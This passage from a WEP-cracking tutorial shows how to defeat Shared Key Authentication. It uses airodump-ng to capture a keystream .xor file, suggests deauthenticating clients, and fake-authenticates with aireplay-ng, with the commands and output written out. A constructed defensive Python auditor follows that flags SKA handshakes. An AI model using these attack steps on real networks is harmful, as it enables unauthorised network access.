Scenario 3: WEP encryption, Shared Key Authentication instead of OPEN
What if the AP does not use OPEN authentication, but Shared Key Authentication?
Well, aireplay-ng --fakeauth will not just work. It will detect that Open System authentication cannot be used, and will then attempt to get the shared key. In fact, it needs to see a client successfully authenticate to the AP before it will be able to grab the SKA and use it.
20:15:01 Sending Authentication Request (Open System) [ACK]
20:15:01 Switching to shared key authentication
As long as a client has not associated, the AUTH column in airodump-ng will stay empty. When Shared Key is used, and after a client has connected, the column will state SKA. From that point forward, you can use the Shared Key to do fake auth.
First, launch airodump-ng and write all data to disk (airodump-ng -w /tmp/filesout ath1).
When a client authenticates, airodump-ng will write a .xor file to disk, containing the PRGA xor bits. Of course, if it takes too long before a client authenticates, you can try to deauthenticate an existing client (if any).
If the .xor file is saved on disk, you can attempt to do the fake auth by providing the .xor file:
root@bt:/tmp# aireplay-ng -1 0 -e TestNet -y /tmp/filesout.xor -a 00:19:5B:52:AD:F7 ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
20:23:58 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
20:23:58 Sending Authentication Request (Shared Key) [ACK]
20:23:58 Authentication 1/2 successful
20:23:58 Sending encrypted challenge. [ACK]
20:23:58 Authentication 2/2 successful
20:23:58 Sending Association Request [ACK]
20:23:58 Association successful :-) (AID: 1)
Hooray – from this point forward, you can use the same techniques as explained in the first two scenarios.
Note : if the number of Packets stops increasing, just stop sending packets, do a re-associate (fake auth) and start sending packets again. In most cases, this will kick off the data packet increase again.
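From the defender's side, the reason SKA is worth spotting is that frame 2 of the handshake carries the plaintext challenge and frame 3 the WEP-encrypted copy, which is exactly the keystream material the .xor file holds. The following is an added example, not code from the original post or from the aircrack-ng project: a small auditor over 802.11 authentication frame bodies that flags APs using Shared Key Authentication and stations that complete the handshake repeatedly (the re-associate pattern noted above). The frame bodies and the double handshake are constructed; the two MAC addresses are the ones from the output above.

```python
import struct
from collections import defaultdict
# 802.11 Authentication frame body (little-endian): algorithm(2) | seq(2) | status(2) | IEs
AUTH_ALGORITHMS = {0: "Open System", 1: "Shared Key"}
CHALLENGE_TEXT_IE = 16  # element ID of the Challenge Text IE carried in SKA frame 2

def parse_auth_body(body: bytes) -> dict:
    """Decode the fixed fields of an unencrypted authentication frame body."""
    if len(body) < 6:
        raise ValueError("authentication frame body too short")
    alg, seq, status = struct.unpack_from("<HHH", body, 0)
    has_challenge = len(body) >= 8 and body[6] == CHALLENGE_TEXT_IE
    return {"alg": AUTH_ALGORITHMS.get(alg, "unknown"), "seq": seq,
            "status": status, "challenge": has_challenge}

def audit_auth_frames(frames):
    """frames: (src, dst, protected, body); SKA frames 2/4 go AP -> station."""
    completions = defaultdict(int)  # (bssid, station) -> completed SKA handshakes
    findings = []
    for src, dst, protected, body in frames:
        if protected:  # SKA frame 3 is WEP-encrypted; its fixed fields are unreadable
            continue
        f = parse_auth_body(body)
        if f["alg"] != "Shared Key":
            continue
        if f["seq"] == 2 and f["challenge"]:  # AP hands out the plaintext challenge
            findings.append(f"{src}: SKA challenge to {dst}; challenge/response pair exposes WEP keystream")
        elif f["seq"] == 4 and f["status"] == 0:  # AP confirms the handshake
            completions[(src, dst)] += 1
    for (bssid, station), n in completions.items():
        if n > 1:
            findings.append(f"{bssid}: {station} completed SKA {n} times (repeated re-auth)")
    return findings

def ska_frame(seq, status=0, challenge=b""):
    # Build a constructed Shared Key authentication body for the sample below
    body = struct.pack("<HHH", 1, seq, status)
    if challenge:
        body += bytes([CHALLENGE_TEXT_IE, len(challenge)]) + challenge
    return body

# Constructed sample: one full SKA exchange, then the same station authenticates again
AP, STA = "00:19:5B:52:AD:F7", "00:1C:BF:90:5B:A3"  # MACs taken from the output above
CHALLENGE = bytes(range(128))  # constructed; a real AP sends 128 random bytes
SAMPLE_FRAMES = [
    (STA, AP, False, ska_frame(1)),
    (AP, STA, False, ska_frame(2, challenge=CHALLENGE)),
    (STA, AP, True, b"\x00" * 140),  # frame 3: encrypted challenge, body opaque here
    (AP, STA, False, ska_frame(4)),
] * 2  # the handshake repeated once more
```

Running audit_auth_frames(SAMPLE_FRAMES) yields two challenge findings for the AP and one repeated re-auth finding for the station.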